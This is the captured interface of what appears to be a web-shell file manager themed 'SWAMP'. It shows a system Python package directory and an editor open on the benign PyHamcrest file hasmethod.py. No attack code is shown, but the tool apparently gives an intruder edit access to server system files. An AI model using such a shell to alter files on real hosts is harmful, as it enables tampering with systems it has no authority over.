░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/usr/lib/python3/dist-packages/hamcrest/core/helpers
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: hasmethod.py
__author__ = "Jon Reid" __copyright__ = "Copyright 2011 hamcrest.org" __license__ = "BSD, see License.txt" def hasmethod(obj: object, methodname: str) -> bool: """Does ``obj`` have a method named ``methodname``?""" if not hasattr(obj, methodname): return False method = getattr(obj, methodname) return callable(method)
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📁 __pycache__/
DIR
—
2026-03-10 17:36
📄 __init__.py
PY
146 B
2024-02-17 15:42
EDIT
📄 hasmethod.py
PY
346 B
2024-02-17 15:42
EDIT
📄 ismock.py
PY
319 B
2024-02-17 15:42
EDIT
📄 wrap_matcher.py
PY
748 B
2024-02-17 15:42
EDIT